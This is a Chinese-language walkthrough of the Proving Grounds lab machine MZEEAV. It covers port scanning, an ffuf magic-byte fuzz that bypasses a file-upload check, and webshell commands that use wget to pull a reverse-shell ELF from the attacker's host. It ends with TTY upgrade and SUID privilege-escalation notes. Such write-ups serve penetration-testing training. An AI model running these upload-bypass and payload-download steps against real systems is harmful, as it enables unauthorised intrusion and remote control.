PG靶机复现 MZEEAV

端口扫描

nmap -sC -sV -Pn -n -T4 -p- 192.168.229.33

枚举

目录扫描

发现backup.zip文件

查看其中的upload.php代码发现是检查magicbytes

绕过bypass

下载magicbytes数据库，这个不错

https://github.com/FanaticPythoner/pyMagicBytes/blob/master/DB

提取：

cat ./DB | awk -F '|' '{print $3}' | sort -u > ./magic_bytes_hex.txt

然后使用burpsuite抓包

将请求保存到本地文件，方便使用
需要在请求中添加FUZZ，告诉ffuf工具进行利用

然后

ffuf -c --request-proto http -w <(while read h; do echo $(echo $h | xxd -r -p); done < ./magic_bytes_hex.txt) -request ./fufftest -fr 'Unsupported file type!'

可以看见已经绕过

成功，拿到一个webshell

测试一下80端口是否可以出站，没问题
上传恶意elf文件

http://192.168.229.33/upload/mime_shell.php?cmd=wget%20http://192.168.45.227/reshell%20-O%20/tmp/reshell

http://192.168.229.33/upload/mime_shell.php?cmd=chmod%20777%20/tmp/reshell

成功拿到shell

提取

先拿到一个TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm-256color
Ctrl + z
stty raw -echo;fg
reset

拿到local.txt,
然后我喜欢上传linpeas.sh和pspy64进行枚举

发现一个未知的suid二进制文件


检查用法，发现就是find，名字改了


利用

成功